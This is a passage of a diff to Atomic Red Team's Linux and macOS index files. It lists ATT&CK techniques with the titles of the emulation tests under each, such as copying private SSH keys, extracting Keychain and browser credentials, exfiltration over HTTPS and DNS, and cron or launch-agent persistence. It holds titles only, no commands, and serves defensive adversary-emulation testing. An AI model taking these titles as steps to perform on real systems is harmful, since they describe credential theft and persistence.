- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- T1213.002 Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# execution
- [T1053.001 At (Linux)](../../T1053.001/T1053.001.md)
- Atomic Test #1: At - Schedule a job [linux]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1609 Container Administration Command](../../T1609/T1609.md)
- Atomic Test #1: ExecIntoContainer [containers]
- [T1053.007 Container Orchestration Job](../../T1053.007/T1053.007.md)
- Atomic Test #1: ListCronjobs [containers]
- Atomic Test #2: CreateCronjob [containers]
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1610 Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.003 Malicious Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.008 Network Device CLI [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.006 Python](../../T1059.006/T1059.006.md)
- Atomic Test #1: Execute shell script via python's command mode arguement [linux]
- Atomic Test #2: Execute Python via scripts (Linux) [linux]
- Atomic Test #3: Execute Python via Python executables (Linux) [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1153 Source [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.006 Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.007 JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.002 Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1106 Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.006 Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1153 Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.004 Unix Shell](../../T1059.004/T1059.004.md)
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
- Atomic Test #2: Command-Line Interface [macos, linux]
- Atomic Test #3: Harvest SUID executable files [linux]
- Atomic Test #4: LinEnum tool execution [linux]
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1059.005 Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# exfiltration
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020 Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
- Atomic Test #1: Data Transfer Size Limits [macos, linux]
- [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
- [T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md)
- Atomic Test #2: Exfiltrate data HTTPS using curl linux [macos, linux]
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011.001 Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1041 Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1011 Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1048.001 Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md)
- Atomic Test #1: Exfiltration Over Alternative Protocol - HTTP [macos, linux]
- Atomic Test #3: Exfiltration Over Alternative Protocol - DNS [linux]
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1020.001 Traffic Duplication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1567 Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.002 Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1567.001 Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1029 Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1537 Transfer Data to Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# initial-access
- [T1078.004 Cloud Accounts](../../T1078.004/T1078.004.md)
- Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, windows, linux, macos]
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.001 Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.004 Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.003 Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.001 Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195.002 Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1190 Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1200 Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566 Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.001 Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.002 Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1195 Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1199 Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
atomics/Indexes/Indexes-Markdown/macos-index.md
+319 -371
View File
@@ -1,123 +1,44 @@
# macOS Atomic Tests by ATT&CK Tactic & Technique
# credential-access
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.003 Bash History](../../T1552.003/T1552.003.md)
- Atomic Test #1: Search Through Bash History [linux, macos]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Credential Stuffing](../../T1110.004/T1110.004.md)
- Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
- [T1552.001 Credentials In Files](../../T1552.001/T1552.001.md)
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
- Atomic Test #2: Extract passwords with grep [macos, linux]
- Atomic Test #5: Find and Access Github Credentials [macos, linux]
- T1555 Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.003 Credentials from Web Browsers](../../T1555.003/T1555.003.md)
- Atomic Test #2: Search macOS Safari Cookies [macos]
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1555.001 Keychain](../../T1555.001/T1555.001.md)
- Atomic Test #1: Keychain [macos]
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1040 Network Sniffing](../../T1040/T1040.md)
- Atomic Test #2: Packet Capture macOS [macos]
- T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.002 Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.001 Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1555.005 Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1110.003 Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.003 Pluggable Authentication Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1552.004 Private Keys](../../T1552.004/T1552.004.md)
- Atomic Test #2: Discover Private SSH Keys [macos, linux]
- Atomic Test #4: Copy Private SSH Keys with rsync [macos, linux]
- Atomic Test #5: Copy the users GnuPG directory with rsync [macos, linux]
- T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1558 Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552 Unsecured Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.002 Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.001 Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #3: Execute commands from clipboard [macos]
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 GUI Input Capture](../../T1056.002/T1056.002.md)
- Atomic Test #1: AppleScript - Prompt User for Password [macos]
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.001 Keylogging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #1: Screencapture [macos]
- Atomic Test #2: Screencapture (silent) [macos]
- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.006 Dynamic Linker Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1548.004 Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- [T1078.003 Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #2: Create local account with admin privileges - MacOS [macos]
- T1547.015 Login Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 RC Scripts](../../T1037.004/T1037.004.md)
- T1055 Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1548.001 Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
@@ -130,17 +51,75 @@
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- [T1546.004 Unix Shell Configuration Modification](../../T1546.004/T1546.004.md)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# persistence
- [T1546.004 .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1136 Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1053.003 Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
- T1078.001 Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1136.002 Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574.004 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.014 Emond](../../T1546.014/T1546.014.md)
- Atomic Test #1: Persistance with Event Monitor - emond [macos]
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1547.006 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1546.006 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1543.001 Launch Agent](../../T1543.001/T1543.001.md)
- Atomic Test #1: Launch Agent [macos]
- [T1543.004 Launch Daemon](../../T1543.004/T1543.004.md)
- Atomic Test #1: Launch Daemon [macos]
- [T1053.004 Launchd](../../T1053.004/T1053.004.md)
- Atomic Test #1: Event Monitor Daemon Persistence [macos]
- [T1136.001 Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #2: Create a user account on a MacOS system [macos]
- T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.002 Logon Script (Mac)](../../T1037.002/T1037.002.md)
- Atomic Test #1: Logon Scripts - Mac [macos]
- [T1547.011 Plist Modification](../../T1547.011/T1547.011.md)
- Atomic Test #1: Plist Modification [macos]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.004 Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #1: rc.common [macos]
- [T1547.007 Re-opened Applications](../../T1547.007/T1547.007.md)
- Atomic Test #1: Re-Opened Applications [macos]
- Atomic Test #2: Re-Opened Applications [macos]
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1037.005 Startup Items](../../T1037.005/T1037.005.md)
- Atomic Test #1: Add file to Local Library StartupItems [macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1546.005 Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap [macos, linux]
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1505.003 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
# defense-evasion
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1027.001 Binary Padding](../../T1027.001/T1027.001.md)
